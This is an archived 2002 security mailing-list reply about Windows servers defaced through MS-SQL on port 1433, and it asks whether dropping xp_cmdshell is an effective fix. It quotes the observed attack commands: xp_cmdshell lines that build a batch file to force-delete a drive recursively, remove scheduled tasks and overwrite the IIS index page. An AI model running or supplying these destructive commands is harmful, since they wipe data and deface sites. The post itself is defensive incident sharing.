RE: Windows Systems Defaced

From: Steve Zenone (zenoneat_private)
Date: Thu May 02 2002 - 20:23:56 PDT

  • Next message: David Ashwood: "RE: Windows Systems Defaced"

    Stephen W. Thompson wrote:
    |> Have any of you seen similar activity? Any thoughts?
    |Yes, we had one that matches most of your details.  These
    |are exact matches:
    |>  [] Damage occurred around 1600 on 5/1/2002
    |BUT=>   (approx. 16:00 EDT for us)
    |>  [] Win-popup message with "F---ing University of Rochester"
    |>       -- NOTE: not all systems running IIS
    |>  [] Admins claimed that all systems were patched correctly
    |>  [] Most were running updated and current AV
    Thank you very much for your reply - it definitely helps!
    We have been seeing MS-SQL (1433/tcp) attacks that try and execute 
    the following: 
    -----BEGIN SNIPPET-----
        xp_cmdshell 'echo net send localhost F---ing University of Rochester 
    rebooting... > rochester.bat'
        xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
        xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
        xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
        xp_cmdshell 'at /delete /y'
        xp_cmdshell 'echo if exist \inetpub\wwwroot\ type 
    %systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >> 
    -----END SNIPPET-----
    The above commands were directed to systems that were listening on
    port 1433/tcp and accessible from the outside. It appears that there
    were multiple source IPs involved in this attack.
    At this time, I am not completely clear on how to protect from this
    attack. What I've researched is that since external functions such 
    as xp_cmdshell, xp_startmail, xp_sendmail, and xp_stopmail present 
    possible security risks, it is recommended to drop such external 
    system functions.  Else, deny EXECUTE permission on them to specific 
    users/roles if dropping these procedures would break any of the SQL 
    Server. I haven't tested this - but does anyone on this list know if
    this is a safe and effective solution?
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:

    This archive was generated by hypermail 2b30 : Thu May 02 2002 - 22:25:14 PDT